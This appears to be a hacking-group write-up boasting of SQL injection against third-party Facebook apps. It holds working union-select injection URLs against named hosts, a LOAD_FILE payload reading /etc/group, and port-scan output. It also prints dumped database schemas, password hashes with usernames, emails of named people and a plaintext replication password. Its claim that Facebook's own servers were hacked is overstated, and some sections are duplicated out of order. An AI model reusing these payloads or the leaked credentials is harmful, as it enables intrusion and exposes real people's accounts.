[!] Found /etc/group
[!] http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,LOAD_FILE('/etc/group'),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--


goOd =] Nice Hacking old school xD


__ __ __
/'__`\ /'__`\ /'__`\
/\ \/\ \ __ _/\ \/\ \/\_\L\ \
\ \ \ \ \/\ \/'\ \ \ \ \/_/_\_<_
\ \ \_\ \/> \ \____//\_/\_\\ \____/\ \____/
\/___/ \//\/_/ \/___/ \/___/
[Conclusion]



There's no 100% security! Be safe my friends! Watch for vulnerabilities and promptly update! Watch for updates Inj3ct0r.com (Inj3ct0r Exploit Database)



__ __ __ __
/'__`\ /'__`\/\ \\ \
/\ \/\ \ __ _/\ \/\ \ \ \\ \
\ \ \ \ \/\ \/'\ \ \ \ \ \ \\ \_
\ \ \_\ \/> \ \____//\_/\_\\ \____/\/_/\_\_/
\/___/ \//\/_/ \/___/ \/_/
[Greetz]



Greetz all users Inj3ct0r.com and 31337 Inj3ct0r Members!

31337 Inj3ct0r Members:

cr4wl3r, The_Exploited, eidelweiss, SeeMe, XroGuE, agix, gunslinger_, Sn!pEr.S!Te, indoushka,

Sid3^effects, L0rd CrusAd3r, Th3 RDX, r45c4l, Napst3r™, etc..

----------------------------------------------------------------------------------------------

Personally h4x0rz:
VMw4r3 (none)
Sir Zaid http://inj3ct0r.com/author/2580
Dante90 http://inj3ct0r.com/author/916
SONiC http://inj3ct0r.com/author/2545
**RoAd_KiLlEr** http://inj3ct0r.com/author/2447
MasterGipy http://inj3ct0r.com/author/2346

You are good hackers. Respect y0u!


Sir Zaid ( http://inj3ct0r.com/author/2580 ), Thank you that pushed me to write this article, and reported the dependence! Personal Respect to you from Inj3ct0r Team!

Friendly projects : darkc0de, Hack0wn.com , SecurityVulns.com, SecurityHome.eu, Xiya.org, Packetstormsecurity.org.. we have many friends)) Go http://inj3ct0r.com/links =]

At the time of publication, all requests to work! Attached images : inj3ct0r.com/files/facebook_part2.zip

We want to thank the following people for their contribution.

Do not forget to keep track of vulnerabilities in Inj3ct0r.com

H.A.C.K.T.I.V.I.S.M. WIN! =]


# Inj3ct0r.com

Facebook hacking

Saludos Mundo libre.

=================================================================
FaceBook's servers was hacked by Inj3ct0r team. Hack of the year!
=================================================================



Original: http://inj3ct0r.com/exploits/11638

[+] English translation
Inj3ct0r official website => Inj3ct0r.com

__ __ ___
__ __ /'__`\ /\ \__ /'__`\
/\_\ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __ ___ ___ ___ ___
\/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ /'___\ / __`\ /' __` __`\
\ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ __/\ \__//\ \L\ \/\ \/\ \/\ \
\ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ /\_\ \____\ \____/\ \_\ \_\ \_\
\/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/_/\/____/\/___/ \/_/\/_/\/_/
\ \____/
\/___/


[0x00] [Introduction]
[0x01] [First impressions]
[0x02] [Search for bugs]
[0x03] [Inj3ct0r Crash Exploit]
[0x04] [Conclusion]
[0x05] [Greetz]


If you want to know the Inj3ct0r group, read: http://inj3ct0r.com/exploits/9845



__ __ __
/'__`\ /'__`\ /'__`\
/\ \/\ \ __ _/\ \/\ \/\ \/\ \
\ \ \ \ \/\ \/'\ \ \ \ \ \ \ \ \
\ \ \_\ \/> \ \____//\_/\_\\ \____/\ \____/
\/___/ \//\/_/ \/___/ \/___/
[Introduction]




+ [En] => In this log file you will read a limited version of the information gathered and provided, since the most important
parts are being kept private in order to be analyzed by the proper authorities and close loopholes in the system.

We did not change the main page, do not sell backup server does not delete files.

We have demonstrated the flaw in the system. Start =] ..



__ __ _
/'__`\ /'__`\ /' \
/\ \/\ \ __ _/\ \/\ \/\_, \
\ \ \ \ \/\ \/'\ \ \ \ \/_/\ \
\ \ \_\ \/> \ \____//\_/\_\\ \____/ \ \_\
\/___/ \//\/_/ \/___/ \/_/
[First impressions]




At first glance, FaceBook well protected social network.
Scanning FaceBook server did not give nothing interesting ... )

..>

Initiating Parallel DNS resolution of 1 host.
Completed Parallel DNS resolution of 1 host.
Initiating SYN Stealth Scan
Scanning facebook.com (69.63.181.11) [1000 ports]
Discovered open port 443/tcp on 69.63.181.11
Discovered open port 80/tcp on 69.63.181.11
Completed SYN Stealth Scan 13.16s elapsed (1000 total ports)
Initiating Service scan
Scanning 2 services on facebook.com (69.63.181.11)
Service scan Timing: About 50.00% done; ETC:
Completed Service scan at 22:41, 104.15s elapsed (2 services on 1 host)
NSE: Script scanning 69.63.181.11.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 22:41
Completed NSE at 22:41, 0.38s elapsed
NSE: Script Scanning completed.
Nmap scan report for facebook.com (69.63.181.11)
Host is up (0.17s latency).
Hostname facebook.com resolves to 4 IPs. Only scanned 69.63.181.11
rDNS record for 69.63.181.11: www-10-01-snc2.facebook.com
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION 80/tcp open http 443/tcp open ssl/https


go ahead .. =]


[Search for bugs]



We use GoOgle.com

request: Facebook+Vulnerability [search]

We see a lot of different bug / exploits / etc ... Most see only XSS Vulnerabilities

but all this can be found by searching : http://inj3ct0r.com/search

All vulnerabilities are closed (Nothing does not work ... Let us once again to GoOgle.com

request: site:facebook.com WARNING error

fuck...
Let us not lose heart) Hackers are not looking for easy ways


Visit Facebook.com

Let us search bugs in Web Apps.

http://www.facebook.com/robots.txt


oooooooooooooooooooooooooooo
User-agent: *
Disallow: /ac.php
Disallow: /ae.php
Disallow: /album.php
Disallow: /ap.php
Disallow: /feeds/
Disallow: /p.php
Disallow: /photo_comments.php
Disallow: /photo_search.php
Disallow: /photos.php

User-agent: Slurp
Disallow: /ac.php
Disallow: /ae.php
Disallow: /album.php
Disallow: /ap.php
Disallow: /feeds/
Disallow: /p.php
Disallow: /photo.php
Disallow: /photo_comments.php
Disallow: /photo_search.php
Disallow: /photos.php

User-agent: msnbot
Disallow: /ac.php
Disallow: /ae.php
Disallow: /album.php
Disallow: /ap.php
Disallow: /feeds/
Disallow: /p.php
Disallow: /photo.php
Disallow: /photo_comments.php
Disallow: /photo_search.php
Disallow: /photos.php

# E-mail webmaster@facebook.com and alex@facebook.com if you're authorized to access these, but getting denied.
Sitemap: http://www.facebook.com/sitemap.php
00000000000000000000000000000000

nothing interesting =\

http://apps.facebook.com/tvshowchat/

I looked closely, I noticed links

http://apps.facebook.com/tvshowchat/show.php?id=1 habit to check the variable vulnerability...

check:

http://apps.facebook.com/tvshowchat/show.php?id=inj3ct0r


ooooooooooooooooooooooooooo

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 28

Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : Space required after the Public Identifier in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

Warning: simplexml_load_string() [function.simplexml-load-string]: in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : SystemLiteral " or ' expected in /home/tomkincaid

Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : Space required after the Public Identifier in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 164

and other....

oooooooooooooooooooooooooooo


O_o opsss! After sitting for a while, I realized that one of the servers is on MySql.

Writing exploits, I got the following:
http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+@@version--+1


ooooooooooooooooooooooooooo

Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

Warning: simplexml_load_string() [function.simplexml-load-string]: body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 7: parser error : Opening and ending tag mismatch: body line 3 and html in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

Warning: simplexml_load_string() [function.simplexml-load-string]: html in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

5.0.45-log <= ALERT!!!

Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123

and other....

oooooooooooooooooooooooooooo


Database : adminclt_testsite
Database User : adminclt_13@209.68.2.10
MySQL Version : 5.0.67-log


super = ] Now, we just can say that there is SQL Injection Vulnerability

http://apps.facebook.com/tvshowchat/show.php?id=[SQL Injection Vulnerability]

Now we know that there is MySql 5.0.45-log

Then let's write another exploit to display tables with information_schema.tables:

http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+count(*)+from+information_schema.tables--+1


oooooooooooooooooooooooooooo

Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

Warning: Invalid argument supplied for foreach() in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 38

Warning: imagepng() [function.imagepng]: Unable to open '/home/tomkincaid/tomkincaid.dreamhosters.com/tv/badges/text/ /1 and 1=2 union select count(*) from information_schema.tables-- 1.png' for writing: No such file or directory in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/

201 <= ALERT!!! 201 tables!

Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123

and other....

oooooooooooooooooooooooooooo

http://apps.facebook.com/observerfacebook/?p=challenges&id=[SQL INJ3ct0r]

Database : adminclt_testsite
Database User : adminclt_13@209.68.2.10
MySQL Version : 5.0.67-log


1) AdCode
2) AdTrack
3) Admin_DataStore
4) Admin_User
5) Challenges
6) ChallengesCompleted
7) Comments
8) ContactEmails
9) Content
10) ContentImages
11) FeaturedTemplate
12) FeaturedWidgets
13) Feeds
14) FolderLinks
15) Folders
16) ForumTopics
17) Log
18) LogDumps
19) Newswire
20) NotificationMessages
21) Notifications
22) Orders
23) OutboundMessages
24) Photos
25) Prizes
26) RawExtLinks
27) RawSessions
28) SessionLengths
29) Sites
30) Subscriptions
31) SurveyMonkeys
32) SystemStatus
33) Templates
34) User
35) UserBlogs
36) UserCollectives
37) UserInfo
38) UserInvites
39) Videos
40) WeeklyScores
41) Widgets
42) cronJobs
43) fbSessions

Admin_User

1) id
2) name
3) email
4) password
5) userid
6) ncUid
7) level

User

1) userid
2) ncUid
3) name
4) email
5) isAdmin
6) isBlocked
7) votePower
8) remoteStatus
9) isMember
10) isModerator
11) isSponsor
12) isEmailVerified
13) isResearcher
14) acceptRules
15) optInStudy
16) optInEmail
17) optInProfile
18) optInFeed
19) optInSMS
20) dateRegistered
21) eligibility
22) cachedPointTotal
23) cachedPointsEarned
24) cachedPointsEarnedThisWeek
25) cachedPointsEarnedLastWeek
26) cachedStoriesPosted
27) cachedCommentsPosted
28) userLevel

http://apps.facebook.com/ufundraise/fundraise.php?cid=[SQL INJ3CT0R]

Current Database : signalpa_fbmFundRraise
Database User : signalpa_rockaja@localhost
MySQL Version : 5.0.85-community

DATABASE
1) information_schema
2) signalpa_CelebrityPuzzle
3) signalpa_EBF
4) signalpa_appNotification
5) signalpa_appnetwork
6) signalpa_dailyscriptures
7) signalpa_ebayfeed
8) signalpa_fbmFundRraise
9) signalpa_fbmFundRraisebeta
10) signalpa_netcards
11) signalpa_paypal
12) signalpa_thepuzzle

signalpa_fbmFundRraise
1) Campaigns
2) Campaigns_Temp
3) FB_theme
4) IfundDollars
5) Languages
6) Payments
7) Paymentsoops
8) Supporters
9) Users
10) Withdrawals
11) invites
12) invites_copy
13) mp_passwords
14) payment_codes
15) txt_codes
16) valid_servers
17) weeklyBonus

[+] Column: Users

1) id
2) name
3) email
4) mobile_no
5) address
6) country
7) password
8) organisation
9) date_created
10) date_updated
11) status
12) facebook_id
13) isFacebookFan
14) verify
15) paypalUse
16) paypalEmail
17) bacUse
18) bacAcc
19) bacName
20) bacLocation
21) bacCountry
22) bacIBAN
23) bacSort_code
24) current_rank
25) new_rank
26) cronjob
27) max_fundraise

[+] Column: mp_passwords
1) id
2) password
3) username
4) status
5) number
6) rc
7) referer
8) transID
9) currency
10) transType
11) amount
12) confirmed
13) date

signalpa_paypal
1) paypal_cart_info
2) paypal_payment_info
3) paypal_subscription_info
[1] AdrianW: [1] c6553032e2f1bcaf30aa333d0228b783:
[2] Akwala: [2] b0c08027fd0f4deec8515c47125de023:
[3] Aldri: [3] 0366923e9c631e65e30315eff2a14a59:

Column: paypal_cart_info
1) txnid
2) itemname
3) itemnumber
4) os0
5) on0
6) os1
7) on1
8) quantity
9) invoice
10) custom

[+] Column : paypal_payment_info
1) firstname
2) lastname
3) buyer_email
4) street
5) city
6) state
7) zipcode
8) memo
9) itemname
10) itemnumber
11) os0
12) on0
13) os1
14) on1
15) quantity
16) paymentdate
17) paymenttype
18) txnid
19) mc_gross
20) mc_fee
21) paymentstatus
22) pendingreason
23) txntype
24) tax
25) mc_currency
26) reasoncode
27) custom
28) country
29) datecreation


http://apps.facebook.com/tvshowchat/show.php?id=[SQL INJ3CT0R]


Current Database : tv
Database User : tomkincaid@ps5008.dreamhost.com
MySQL Version : 5.0.45-log

[+] DATABASES

1) information_schema
2) astro
3) candukincaid
4) cemeteries
5) churchwpdb
6) countdownapp
7) crush
8) dare
9) friendiq
10) giants
11) hookup
12) jauntlet
13) loccus
14) luciacanduwp
15) maps
16) martisor
17) mediax
18) mostlikely
19) music
20) pimpfriends
21) plans
22) politicsapp
23) postergifts
24) posters2
25) projectbasecamp
26) pwnfriends
27) quiz
28) seeall
29) send
30) supporter
31) swapu
32) tomsapps
33) travelbug

[+] tab.send

1) app
2) item
3) itemforuser
4) neverblue
5) user

[+] Columns
user(12454)

1) userid
2) siteid
3) appkey
4) session
5) points
6) added
7) removed

Tab. candukincaid

1) wp_comments
2) wp_links
3) wp_options
4) wp_post****
5) wp_posts
6) wp_px_albumPhotos
7) wp_px_albums
8) wp_px_galleries
9) wp_px_photos
10) wp_px_plugins
11) wp_term_relationships
12) wp_term_taxonomy
13) wp_terms
14) wp_user****
15) wp_users


[+]Column wp_users

1) ID
2) user_login
3) user_pass
4) user_nicename
5) user_email
6) user_url
7) user_registered
8) user_activation_key
9) user_status
10) display_name

etc...

http://apps.facebook.com/fluff/fluffbook.php?id=[SQL Inj3ct0r]

> ~ inj3ct0r_facebook_exploit [ENTER]

root:*368C08021F7260A991A9D8121B7D7808C99BBB8A
slave_user:*38E277D5CA4EAA7E9A73F8EF80813D7B5859E407
muu:*74A45B921A1A918B18AE9B137396E5A67E006262
monitor:*1840AE2C95804EC69321D1EE33AADFA249817034
maatkit:*9FA5157314A2CF7448A34DA070B5D44E977A1220

http://apps.facebook.com/snowago/area.php?areaid=[SQL Inj3ct0r]

Database: affinispac_fb
User: affinispac_fb@localhost
Version: 5.0.67-community

http://www.chinesezodiachoroscope.com/facebook/index1.php?user_id=[SQL Inj3ct0r]

>plucky@localhost : facebook : 4.0.13-log

etc... =]


Next xD

Database: thetvdb
User: thetvdb@localhost
Version: 5.0.51a-24-log


[Database]: thetvdb

[Table]

[1]aka_seriesname
[2]apiusers
[3]banners
[4]deletions
[5]genres
[6]imgstatus
[7]languages
[8]mirrors
[9]networks
[10]ratings
[11]runtimes
[12]seriesactors
[13]seriesupdates
[14]translation_episodename
[15]translation_episodeoverview
[16]translation_labels
[17]translation_seriesname
[18]translation_seriesoverview
[19]tvepisodes
[20]tvseasons
[21]tvseries
[22]user_episodes
[23]users

users:

id,username,userpass,emailaddress,ipaddress,userlevel,languageid,favorites,
favorites_displaymode,bannerlimit,banneragreement,active,uniqueid,
lastupdatedby_admin,mirrorupdate


[userpass]

[1] *E92C1AB432D14ACA4D6618A9DFC22810363B114E:
[2] *C62726955C4492A6A0CB7319C3928DACEAC4C66D:
[3] *887C5DA43E5ACEE73689956A4497C0EDA956E790:
[4] *57D6D9BF9F1962C9A006BB451FAF21693624391E:
[5] *51121B1DC695FF11A3AEF514AAA0C487611FD98B:
[6] 3d801aa532c1cec3ee82d87a99fdf63f

[Database]: wiki

[Table]

[24]archive
[25]categorylinks
[26]externallinks
[27]filearchive
[28]hitcounter
[29]image
[30]imagelinks
[31]interwiki
[32]ipblocks
[33]job
[34]langlinks
[35]logging
[36]math
[37]objectcache
[38]oldimage
[39]page
[40]page_restrictions
[41]pagelinks
[42]querycache
[43]querycache_info
[44]querycachetwo
[45]recentchanges
[46]redirect
[47]revision
[48]searchindex
[49]site_stats
[50]templatelinks
[51]text
[52]trackbacks
[53]transcache
[54]user
[55]user_groups
[56]user_newtalk
[57]watchlist

user:

user_id,user_name,user_real_name,user_password,user_newpassword,user_newpass_time,
user_email,user_options,user_touched,user_token,user_email_authenticated,user_email_token,
user_email_token_expires,user_registration,user_editcount

['user_name'] : ['user_pass']


[1] AdrianW: [1] c6553032e2f1bcaf30aa333d0228b783:
[2] Akwala: [2] b0c08027fd0f4deec8515c47125de023:
[3] Aldri: [3] 0366923e9c631e65e30315eff2a14a59:
[4] AleX: [4] afbb46ebf8c46bfb1f286df87d577f87:
[5] Arucard: [5] e94f2b46cbfc681d2346424d7e0e3b3f:
[6] AxesDenyd: [6] a998f782d92a8af1c683e6a0e36404e4:
[7] Badubo: [7] 5a8920177dbf9abddefe4ff49ebbc67c:
[8] Bjarkimg: [8] fd6a9eef25ead144df9592087bb4aec5:
[9] BrandonB1218: [9] 62cda59cc492df4f1b1dd4d1365b5ff5:
[10] Bsudbury: [10] 827d07956629c37855f3518374821872:
[11] Burchard: [11] 4dc05fcbbf5850d27e627d5c4278c4cf:
[12] Carla: [12] f41991b4dfd3b494c39751225e1faa29:
[13] Click170: [13] 9c38b5f4673372a806f38a4dade456cc:
[14] Coco: [14] f6770367b7ca8261a25ea797c24761aa:
[15] Corte: [15] 9add39f338de37ce1cf52eaed38b09b2:
[16] Crippler: [16] b3d947a82648b2707130f176204cbbfd:
[17] Dbkungfu: [17] 0bcb65441f47097f85af79c793c74b95:
[18] Deuce911: [18] 0220c76e24b82236675500f1e536a4be:
[19] DigitallyBorn: [19] 3e57b721280c35ba66f2a151e19c620b:
[20] Divervan10: [20] 1ad65386e69de0896f49c7d0fbaa0cba:
[21] Donovan: [21] 03e4e11728c5f16fc936cb4c1d803029:
[22] Drkshenronx: [22] ea0b8397ad79d255195780e367ccf026:
[23] Emigrating12: [23] c45db536613d53252d00be3dc81cbde0:
[24] Emphatic: [24] 3195961b90ea2fe0ac6d12efac8fef19:
[25] Eta: [25] f083e5e3fd924342f77e4111df8788e1:
[26] Farrism: [26] efef4efa85d73ca0247052687ca9683b:
[27] Fiven: [27] 5f6dd4fde7d37c19d1e267618f55d35f:
[28] FloVi: [28] 918f77c2a0fe807b3cff8816b8aed8ee:
[29] Fritigern: [29] 6a16028b432de68363a20912c31bca03:
[30] Furby: [30] 117088a3b9b504ce23c7926c8691fced:
[31] Gerph: [31] 294d0c1541c7d892962cb51d540753c1:
[32] Hallvar: [32] 4a5da5086b99a7d2f8aef976d364d07c:
[33] Happyfrog: [33] 189a598dbdf27734a47c4731c099712d:
[34] Hjeffrey: [34] 9b6daf5130c8c1a329a1e6ceff31d448:
[35] Hsvjez: [35] fef14c536557ec3b0727246e6f57fadb:
[36] Jase81: [36] 9e4c45874be6735b6432e5f060660a46:
[37] Jcnetdev: [37] 88a2dc251c777d48189501a79e3d3ffa:
[38] Jcpmcdonald: [38] 083968e4c21e6f3ff47c3fefad7c3ff7:
[39] Jobba: [39] 699cb250cc53224bf0220d4c8f513a27:
[40] Jschek: [40] 9bcf4c5f58764dc4c812b78276d5e412:
[41] Juliani1024: [41] c5ea2a208e8e24bd0e3696be6de3bd07:
[42] Kakosi: [42] b747252b62d95163a083acf54141bfc6:
[43] KelleyCook: [43] b929c4422b9ea29845d1bf46fde7e765:
[44] Ken brueck: [44] 1fd5e065ac6587cf351dee24f79def76:
[45] Kennykixx: [45] 2a4a9abc742f3508fa37f37e30ed480b:
[46] Kermtfrg: [46] cbaef6f6fa9175d419af3395f25bd814:
[47] Keydon: [47] e9e984ed67c7e8a67f3406c5506293ec:
[48] Kraigspear: [48] ac70640d36b6c9a3fcff3f66687fd3d5:
[49] Krisg1984: [49] c78ea770e941c369aa3463c9a74d2f1d:
[50] Leecole: [50] 4b3b865528e582b6a4dfc9430aec1ea8:
[51] Livemac: [51] 0e36e0b0866b8911216c464fe8440319:
[52] Markscore: [52] 5710cbdd3de7e28c7c93eb8e48e266a9:
[53] Mcmanuss8: [53] 6262c8e4c7a5bb9d49743c5659d3cc40:
[54] Mcoit: [54] 980a1ea1d9fd960208d004fe7ce928fb:
[55] Mhale62: [55] df318f477b0c4a3e4f9f3e1ced62f607:
[56] Mjh ca: [56] 07223e31ea0a8a617934081475d9ad52:
[57] Mreuring: [57] 42472c97f021f725cea7670b078795a1:
[58] Nathanlburns: [58] b7e16c89320be1b9860dcb83a082881a:
[59] Nekocha: [59] 490c01eea35370bca2c78dce7ab633da:
[60] Ngoring: [60] a19430b436a03fdfda8818f8cf486580:
[61] Nighthawk92: [61] e8c8cf0eeaec4841c14ede3bcac7e6bb:
[62] Null dev: [62] 4e744d982a173d0e1439787da27f022c:
[63] Nunovi: [63] 7325e3df990caadddf2423cf96272fed:
[64] Obsidianpanther: [64] 53fd2e06ca60a0640cdc617681ace453:
[65] PLUCKYHD: [65] 2ac1aa8f8e5341788c9ca7555cc10714:
[66] Plambert: [66] 9333604b2eefdcc01debb843373ae492:
[67] Polargeek: [67] d0394680e24f75e7dae4e0ca23756161:
[68] QyleCoop: [68] af49b70536b2ec2439095947bab36b43:
[69] Ramsay: [69] 317192baea92e857e27c96e80c9f6874:
[70] Scrooge666: [70] 8498d4d9c8de0300f0b8b3bc789d6731:
[71] SeaLawyer: [71] 14dd3e79c6f486319e39ef694cd61a2d:
[72] Searlea: [72] 058beaa0d231d457136015119da5aa34:
[73] Serberus: [73] ff80d6419f6be5d76dd404fdb256eb3c:
[74] Skillzzz: [74] 5f012a10f4eeddacfd2c495f64dbd975:
[75] Smakkie: [75] 7143a09106678ec593eec82fcf3e66fd:
[76] Smoko: [76] d9a1360bfcdedb3c6f48a37442d58dd8:
[77] Smuto: [77] 20ec74ff3d72d42f7593002b0d28a540:
[78] Stdly: [78] 4d7b92f616ffe6b420180e859bf245ba:
[79] Swiip: [79] 120cc4e935a2c57763709392c5eb6fdf:
[80] Szsori: [80] e7fb98c3d405dcc89314996b9c5c6cb2:
[81] THe-BiNk: [81] 49e6e431cccf6a77bf6dafa0c96a361a:
[82] TheStapler: [82] 7278b0168b8cfb38e64d2b6abe6991fc:
[83] Todu: [83] 2173ff53b1fb2bbe3fd49d3d17b6f09f:
[84] TommyD: [84] ca62c603dffc337b87a662fa904caa51:
[85] TrocdRonel: [85] 318698c02f2f6ea7fef38e17cdaa1ac5:
[86] Trol1234: [86] ce07cb60f64f2119a657a1427edc359e:
[87] Trolik123456: [87] d392ceb168469aca3b21e1aaeb00f301:
[88] Trolik23512: [88] dd16749110a800511459fa4ed655b36c:
[89] Trololo23512: [89] 3d508eed899c625389167d2216fae370:
[90] Weaverslodge: [90] c2c22a2c65b487915911c1d7f66b85e8:
[91] Woodstock123: [91] ba4d45f8c7e9574dd839993a2001d5cd:
[92] Wwarby: [92] 04409a510d208e737fa00cd97c712740:
[93] Yabba: [93] 4b1febeed49cd185a8efbb8a61f68d74:
[94] Zombiigraet33456904: [94] 028785be8488292e8b88137b5fd2c128:
[95] Zombiigraet33456906: [95] 4820e4653d77bb3ccab9e7ed25155a5b:
[96] Zubbizub1212: [96] ea2e5c44c48ce8f880a0f1627e599868:

---------------------------------------------------------------------------------------------------------------------------------------------------

read /etc/hosts

127.0.0.1 localhost localhost.localdomain
192.168.1.167 140696-db2.flufffriends.com 140696-db2
192.168.1.166 140695-db1.flufffriends.com 140695-db1
192.168.1.165 140694-web2.flufffriends.com 140694-web2
192.168.1.164 140693-web1.flufffriends.com 140693-web1
69.63.176.141 api.facebook.com
208.116.17.80 peanutlabs.com

----------------------------------

/etc/my.cnf

#SERVER 5 IS THE MASTER FOR DB1 AND ROMIS FOR DB1

log-bin=/var/lib/mysqllogs/bin-log

binlog-do-db=fluff2

expire-logs-days=14



server-id = 5



#master-host=69.63.176.141

#master-user=romis_user

#master-password=romis0123

#master-connect-retry=60

replicate-do-db=miserman


#log-slave-updates

expire_logs_days = 14


I think we found a sufficient number of vulnerabilities!

---------------------------

__ __ __
/'__`\ /'__`\ /'__`\
/\ \/\ \ __ _/\ \/\ \/\_\L\ \
\ \ \ \ \/\ \/'\ \ \ \ \/_/_\_<_
\ \ \_\ \/> \ \____//\_/\_\\ \____/\ \____/
\/___/ \//\/_/ \/___/ \/___/
[Inj3ct0r Crash Exploit]



So .. Moving on to the fun friends

To avoid Vandal effects of script-kidds I will not give you a link to shell.php, but I enclose you images and some interesting queries =]

..> Inj3ct0rExploit start . + . + . + . + . + . + .

wp_posts

post_password

wp_users

user_pass

done.....


WordPress! oO one of the modules installed in facebook is Wordpress!


check link: http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+count(*)+from+candukincaid.wp_users--+1


oooooooooooooooooooooooooooo

Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

Warning: simplexml_load_string() [function.simplexml-load-string]: body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 7: parser error : Opening and ending tag mismatch: body line 3 and html in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

Warning: imagepng() [function.imagepng]: Unable to open '/home/tomkincaid/tomkincaid.dreamhosters.com/tv/badges/text/ /1 and 1=2 union select count(*) from candukincaid.wp_users-- 1.png' for writing: No such file or directory in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 67

3 <= ALERT! Users! =]

Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 124

oooooooooooooooooooooooooooo

..> Inj3ct0r_Crach_exploit [ENTER]

user:

admin:$P$BDYUCMozJ/i3UEatmeECLxd3FTLqIe/
lucia:$P$BTlzOyWH5F7gdi42xVjtPMnBGDki1W/
tom:$P$BkfTC.PaWW8alUSQd9j8PSUBG0LIiR.

cracker:

admin : $P$BDYUCMozJ/i3UEatmeECLxd3FTLqIe/ :admin:lcandu@yahoo.com
lucia : $P$BTlzOyWH5F7gdi42xVjtPMnBGDki1W/ :lucia:lcandu@yahoo.com
tom : $P$BkfTC.PaWW8alUSQd9j8PSUBG0LIiR. :tom:tom_kincaid@hotmail.com

see request:


http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws(0x3a,user_login,user_pass)+from+candukincaid.wp_users+limit+1--
http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws%280x3a,user_login,user_pass%29+from+candukincaid.wp_users+limit+1,1--
http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws%280x3a,user_login,user_pass%29+from+candukincaid.wp_users+limit+2,1--



goOd =] Nice Hacking old school xD


__ __ __ __
/'__`\ /'__`\/\ \\ \
/\ \/\ \ __ _/\ \/\ \ \ \\ \
\ \ \ \ \/\ \/'\ \ \ \ \ \ \\ \_
\ \ \_\ \/> \ \____//\_/\_\\ \____/\/_/\_\_/
\/___/ \//\/_/ \/___/ \/_/
[Conclusion]



There's no 100% security! Be safe my friends! Watch for vulnerabilities and promptly update! Watch for updates Inj3ct0r.com (Inj3ct0r Exploit Database)



__ __ ______
/'__`\ /'__`\/\ ___\
/\ \/\ \ __ _/\ \/\ \ \ \__/
\ \ \ \ \/\ \/'\ \ \ \ \ \___``\
\ \ \_\ \/> \ \____//\_/\_\\ \____/\ \____/
\/___/ \//\/_/ \/___/ \/___/
[Greetz]



Greetz all Member Inj3ct0r.com

Friendly projects : Hack0wn.com , SecurityVulns.com, SecurityHome.eu, Xiya.org, Packetstormsecurity.org, exploit-db.com, MorningStarSecurity.com..... we have many friends)) Go http://inj3ct0r.com/links =]

Personally h4x0rz:

